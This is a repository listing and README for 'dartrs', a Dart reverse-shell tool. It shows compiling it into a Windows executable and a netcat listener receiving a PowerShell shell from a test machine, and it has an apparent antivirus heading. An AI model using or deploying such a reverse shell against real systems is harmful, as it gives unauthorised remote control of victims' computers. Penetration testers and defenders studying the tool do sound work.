https://github.com/potato-industries/dartrs
portable dart based reverse shell
https://github.com/potato-industries/dartrs
dart reverse-shell security
Last synced: 8 months ago
JSON representation
portable dart based reverse shell
- Host: GitHub
- URL: https://github.com/potato-industries/dartrs
- Owner: Potato-Industries
- Created: 2019-11-29T00:16:51.000Z (over 6 years ago)
- Default Branch: master
- Last Pushed: 2019-11-29T01:31:41.000Z (over 6 years ago)
- Last Synced: 2025-04-26T20:34:04.075Z (about 1 year ago)
- Topics: dart, reverse-shell, security
- Language: Dart
- Homepage:
- Size: 2.93 KB
- Stars: 9
- Watchers: 1
- Forks: 1
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# dartrs
portable dart based reverse shell (self-contained executable)
**Build**
```
root@kali:/opt/dartrs# apt-get install dart
```
- https://dart.dev/get-dart
**Usage**
create a self-contained binary. (cross compilation is not support by dart2native yet)
- https://medium.com/dartlang/dart2native-a76c815e6baf
```
C:\Users\IEUser\Desktop\dart2native dartrs.dart
Generated: c:/users/ieuser/desktop/dartrs.exe
```
```
root@WOPR-KALI:~# nc -lvp 8080
listening on [any] 8080 ...
connect to [192.168.1.99] from WOPR-KALI [192.168.1.99] 33474
whoami
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\IEUser\Desktop> whoami
msedgewin10\ieuser
```
**AV**

**Limitations**
Code signing issue. (https://github.com/dart-lang/sdk/issues/39106)
Enjoy~